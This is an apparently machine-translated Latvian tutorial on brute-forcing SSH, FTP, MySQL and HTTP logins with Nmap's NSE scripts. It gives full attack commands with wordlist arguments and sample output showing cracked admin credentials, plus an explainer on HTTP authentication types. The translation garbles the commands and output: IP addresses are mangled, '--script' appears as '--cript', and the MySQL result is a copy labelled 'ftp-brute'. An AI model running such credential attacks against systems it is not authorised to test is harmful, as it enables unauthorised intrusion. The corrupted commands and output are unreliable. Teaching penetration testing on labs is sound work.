Nmap

Paroles rupja piespiešana, izmantojot Nmap

Paroles rupja piespiešana, izmantojot Nmap
Brutāla spēka tiešsaistes pakalpojumiem cilvēki parasti izmanto Hydra, Medusa un Metasploit Framework, taču Nmap var izmantot arī, lai brutāli piespiestu daudzus tiešsaistes pakalpojumus. Ir iebūvēti Nmap skripti, kas atbalsta FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP un citus dažādus pakalpojumus. Varat arī pilnvērtīgi izmantot HTTP veidlapu bāzes, pamata un īsas autentifikācijas metodes. Ja jums ir instalēta Nmap, šos skriptus varat redzēt direktorijā “/ usr / share / nmap / scripts”.

[aizsargāts ar e-pastu]: ~ $ sudo apt update && sudo apt jauninājums
[aizsargāts ar e-pastu]: ~ $ sudo apt install nmap -y
[aizsargāts ar e-pastu]: ~ $ cd / usr / share / nmap / scripts /
[aizsargāts ar e-pastu]: ~ $ ls * brute *

Šajā apmācībā mēs izpētīsim, kā mēs varam izmantot Nmap brutālu spēku uzbrukumam.

SSH Brute-Force

SSH ir drošs attālās administrēšanas protokols, un tas atbalsta openssl un paroli balstītu autentifikāciju. Lai uz SSH paroli balstītu brutālu spēku autentifikāciju, mēs varam izmantot “ssh-brute.nse ”Nmap skripts.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ssh * brute *
ssh-brute.nse

Nmap nodot kā argumentu lietotājvārdu un paroļu sarakstu.

[aizsargāts ar e-pastu]: ~ $ nmap --script ssh-brute -p22 192.168. lpp.43.181
--script-args userdb = lietotāji.txt, passdb = paroles.txt
Sākot Nmap 7.70 (https: // nmap.org) plkst. 2020-02-08 17:09 PKT
Nmap skenēšanas ziņojums 192.168. lpp.43.181
Saimnieks ir augšā (0.00033s latentums).
OSTAS VALSTS PAKALPOJUMS
22 / tcp atvērt ssh
| ssh-brute:
| Konti:
| admin: p4ssw0rd - derīgi akreditācijas dati
| _ Statistika: veica 99 minējumus 60 sekundēs, vidējie tps: 1.7
N karte pabeigta: 60 IP skenēta 1 IP adrese (1 resursdators augšup).17 sekundes

FTP Brute-Force

FTP ir failu pārsūtīšanas protokols, kas atbalsta uz paroli balstītu autentifikāciju. Lai rupji izturētu FTP, mēs izmantosim “ftp-brute.nse ”Nmap skripts.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ftp * brute *
ftp-brute.nse

Nmap nodot kā argumentu lietotājvārdu un paroļu sarakstu.

[aizsargāts ar e-pastu]: ~ $ nmap --cript ftp-brute -p21 192.168. lpp.43.181. gads - skripts-args
userdb = lietotāji.txt, passdb = paroles.txt
Sākot Nmap 7.70 (https: // nmap.org) plkst. 2020-02-08 16:51 PKT
Nmap skenēšanas ziņojums 192.168. lpp.43.181
Saimnieks ir augšā (0.00021s latentums).
OSTAS VALSTS PAKALPOJUMS
21 / tcp atvērts ftp
| ftp-brute:
| Konti:
| admin: p4ssw0rd - derīgi akreditācijas dati
| _ Statistika: veica 99 minējumus 20 sekundēs, vidējie tps: 5.0
N karte pabeigta: 19 IP skenēta 1 IP adrese (1 resursdators augšup).50 sekundes

MYSQL Brute-Force

Dažreiz MySQL tiek atstāts atvērts ārējiem savienojumiem un ļauj ikvienam ar to izveidot savienojumu. Tās paroli var uzlauzt, izmantojot Nmap ar skriptu “mysql-brute”.

[aizsargāts ar e-pastu]: ~ $ sudo nmap --script mysql-brute -p3306 192.168. lpp.43.181
--script-args userdb = lietotāji.txt, passdb = paroles.txt
Sākot Nmap 7.70 (https: // nmap.org) plkst. 2020-02-08 16:51 PKT
Nmap skenēšanas ziņojums 192.168. lpp.43.181
Saimnieks ir augšā (0.00021s latentums).
OSTAS VALSTS PAKALPOJUMS
3306 / tcp atvērts mysql
| ftp-brute:
| Konti:
| admin: p4ssw0rd - derīgi akreditācijas dati
| _ Statistika: veica 99 minējumus 20 sekundēs, vidējie tps: 5.0
N karte pabeigta: 19 IP skenēta 1 IP adrese (1 resursdators augšup).40 sekundes

HTTP Brute-Force

HTTP izmanto trīs autentifikācijas veidus, lai autentificētu lietotājus tīmekļa serveros. Šīs metodikas tiek izmantotas maršrutētājos, modemos un uzlabotās tīmekļa lietojumprogrammās, lai apmainītos ar lietotājvārdiem un parolēm. Šie veidi ir:

Pamata autentifikācija

HTTP pamata autentifikācijas protokolā pārlūks kodē lietotājvārdu un paroli ar base64 un nosūta tos galvenē “Autorizācija”. To var redzēt nākamajā ekrānuzņēmumā.

Autorizācija: pamata YWRtaW46YWRtaW4 =

Jūs varat base64 atšifrēt šo virkni, lai redzētu lietotājvārdu un paroli

[e-pasts aizsargāts]: ~ $ echo YWRtaW46YWRtaW4 = | base64 -d
admin: admin

HTTP pamata autentifikācija nav droša, jo tā nosūta gan lietotājvārdu, gan paroli vienkāršā tekstā. Jebkurš Man-in-the-Middle Attacker var viegli pārtvert trafiku un atšifrēt virkni, lai iegūtu paroli.

Sagremota autentifikācija

HTTP satura autentifikācija izmanto jaukšanas paņēmienus, lai šifrētu lietotājvārdu un paroli pirms to nosūtīšanas uz serveri.

Hash1 = MD5 (lietotājvārds: valstība: parole)
Hash2 = MD5 (metode: digestURI)
atbilde = MD5 (Hash1: nonce: nonceCount: cnonce: qop: Hash2)

Šīs vērtības varat redzēt zem galvenes “Autorizācija”.

Sagremota autentifikācija ir droša, jo parole netiek nosūtīta vienkāršā tekstā. Ja uzbrucējs “Man-in-the-Middle” pārtver trafiku, viņš nevarēs iegūt vienkārša teksta paroli.

Veidlapas autentifikācija

Pamata un Digest autentifikācijas atbalsta tikai lietotājvārda un paroles pārsūtīšanu, savukārt uz veidlapu balstītu autentifikāciju var pielāgot, ņemot vērā lietotāja vajadzības. Varat izveidot savu vietni HTML vai JavaScript, lai izmantotu savas kodēšanas un pārsūtīšanas metodes.

Parasti dati veidlapas autentifikācijā tiek sūtīti vienkāršā tekstā. Drošības problēmu gadījumā ir jāpielieto HTTP, lai novērstu uzbrukumus Man-in-the-Middle.

Mēs varam brutāli piespiest visu veidu HTTP autentifikāciju, izmantojot Nmap. Šim nolūkam mēs izmantosim skriptu “http-brute”.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * http * brute *
http-brute.nse

Lai pārbaudītu šo Nmap skriptu, mēs šajā URL atrisināsim publiski mitinātu brutālu spēku izaicinājumu, ko veica pentesteru akadēmija http: // pentesteracademylab.appspot.com / lab / webapp / basicauth.

Mums kā skripta arguments atsevišķi jānorāda viss, ieskaitot resursdatora nosaukumu, URI, pieprasījuma metodi un vārdnīcas.

[aizsargāts ar e-pastu]: ~ $ sudo nmap -p80 --script http-brute pentesteracademylab.appspot.com
--script-args http-brute.resursdatora nosaukums = pentesteracademylab.appspot.com,
http-brute.ceļš = / lab / webapp / basicauth, userdb = lietotāji.txt, passdb = paroles.txt,
http-brute.metode = POST
 
Sākot Nmap 7.70 (https: // nmap.org) plkst. 2020-02-08 21:37 PKT
Nmap skenēšanas ziņojums pentesteracademylab.appspot.com (216.58.210.84)
Saimnieks ir augšā (0.20 gadu latentums).
Citas pentesteracademylab adreses.appspot.com (nav skenēts): 2a00: 1450: 4018: 803 :: 2014
rDNS rekords 216. gadā.58.210.84: mct01s06-in-f84.1e100.tīkls
 
OSTAS VALSTS PAKALPOJUMS
80 / tcp atveriet http
| http-brute:
| Konti:
| admin: aaddd - derīgi akreditācijas dati
| _ Statistika: 29 sekundēs veica 165 minējumus, vidējie tps: 5.3
N karte pabeigta: 31 IP skenēta 1 IP adrese (1 resursdators augšup).22 sekundes

Secinājums

Nmap var izmantot, lai veiktu daudzas lietas, neskatoties uz vienkāršu ostu skenēšanu. Tas var aizstāt Metasploit, Hydra, Medusa un daudzus citus rīkus, kas īpaši izveidoti tiešsaistes brutālai piespiešanai. Nmap ir vienkārši, viegli lietojami iebūvēti skripti, kas iztur gandrīz visus pakalpojumus, tostarp HTTP, TELNEL, SSH, MySQL, Samba un citus.

Noderīgi rīki Linux spēlētājiem
Ja jums patīk spēlēt spēles Linux, iespējams, ka spēļu pieredzes uzlabošanai, iespējams, esat izmantojis tādas lietotnes un utilītprogrammas kā Wine, ...
HD Remastered spēles operētājsistēmai Linux, kurām nekad agrāk nebija Linux laidiena
Daudzi spēļu izstrādātāji un izdevēji nāk klajā ar veco spēļu HD remaster, lai pagarinātu franšīzes darbības laiku. Lūdzu, faniem, kas pieprasa saderī...
Kā izmantot AutoKey, lai automatizētu Linux spēles
AutoKey ir darbvirsmas automatizācijas lietderība operētājsistēmām Linux un X11, kas ieprogrammēta Python 3, GTK un Qt. Izmantojot skriptu un MACRO fu...